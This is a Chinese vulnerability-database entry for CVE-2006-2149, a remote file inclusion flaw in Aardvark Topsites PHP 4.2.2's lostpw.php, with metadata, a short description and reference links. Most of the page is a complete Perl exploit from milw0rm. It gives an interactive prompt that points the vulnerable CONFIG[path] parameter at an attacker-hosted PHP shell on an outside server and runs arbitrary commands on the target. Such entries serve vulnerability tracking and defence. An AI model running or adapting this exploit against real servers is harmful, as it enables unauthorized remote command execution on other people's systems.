Aardvark Topsites PHP LostPW.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110174 漏洞类型 输入验证
发布时间 2006-04-30 更新时间 2006-05-15
CVE编号 CVE-2006-2149 CNNVD-ID CNNVD-200605-043
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/1732
https://www.securityfocus.com/bid/17940
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-043
|漏洞详情
AardvarkTopsitesPHP4.2.2及之前版本的sources/lostpw.php存在PHP远程文件包含漏洞。当启用register_globals时,远程攻击者可以借助CONFIG[path]参数执行任意PHP代码,比如包含含有PHP代码的GIF。
|漏洞EXP
#!/usr/bin/perl
#
# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$ 
#
# to set your PHP shell location:
# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd=
# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd='
# cijfer$
#
# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $

use strict;
use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;

my($command,$verbose,$proxy,$shell,$host,$res);

$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
&usage unless $host;

while()
{
	print color("green"), "cijfer\# ", color("reset");
	chomp($command = <STDIN>);
	exit unless $command;
	if($command =~ m/^http:\/\/(.*)/g)
	{
		$host="http://".$1;
		print "host changed to '";
		print color("bold"), $host."'\n", color("reset");
	}
	elsif($command =~ m/^shell=http:\/\/(.*)/g)
	{
		$shell="http://".$1;
		print "php shell set to '";
		print color("bold"), $shell."'\n", color("reset");
	}
	else
	{
		&exploit($command,$host);
	}
}

sub usage
{
	print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n";
	print "usage: $0 -hpv\n\n";
	print "  -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n";
	print "  -p, --proxy\t\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
	print "  -v, --verbose\t\tverbose mode (debug)\n\n";
	exit;
}

sub exploit
{
	my($command,$host) = @_;
	my($string,$execut,$recv,$sent,$out,$cij,@cij);

	$cij=LWP::UserAgent->new() or die;
	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
	$cij->proxy("http", "http://".$proxy."/") unless !$proxy;

	$string  = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20";
	$string .= uri_escape(shift);
	$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";

	$out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string);

	if($out->is_success)
	{
		@cij=split("_cijfer_",$out->content);
		print substr(@cij[1],1);
	}

	if($verbose)
	{
		$recv=length $out->content;
		print "Total received bytes: ".$recv."\n";
		$sent=length $command;
		print "Total sent bytes: ".$sent."\n";
	}
}

# milw0rm.com [2006-04-30]
|受影响的产品
Aardvark Topsites PHP Aardvark Topsites PHP 4.2.2 Aardvark Topsites PHP Aardvark Topsites PHP 4.1.1 Aardvark Topsites PHP Aardvark Topsites PHP 4.1
|参考资料

来源:VUPEN
名称:ADV-2006-1587
链接:http://www.frsirt.com/english/advisories/2006/1587
来源:SECUNIA
名称:19911
链接:http://secunia.com/advisories/19911
来源:MILW0RM
名称:1732
链接:http://milw0rm.com/exploits/1732
来源:XF
名称:aardvark-lostpw-join-file-include(26189)
链接:http://xforce.iss.net/xforce/xfdb/26189
来源:BID
名称:17940
链接:http://www.securityfocus.com/bid/17940
来源:OSVDB
名称:25158
链接:http://www.osvdb.org/25158